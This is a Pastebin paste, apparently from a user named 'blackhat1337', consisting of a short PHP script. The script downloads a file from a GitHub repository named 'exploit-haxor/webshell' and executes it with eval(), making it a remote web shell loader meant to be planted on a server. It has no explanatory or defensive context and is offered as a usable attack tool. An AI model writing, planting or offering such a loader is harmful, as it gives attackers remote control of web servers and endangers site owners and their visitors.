Advertisement
blackhat1337

Untitled

Feb 29th, 2024
36
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.16 KB | None | 0 0
  1. <?php
  2. $file = file_get_contents('https://raw.githubusercontent.com/exploit-haxor/webshell/main/mydb@.php');
  3. $content = eval("?>$file");
  4. echo $content;
  5. ?>
  6.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement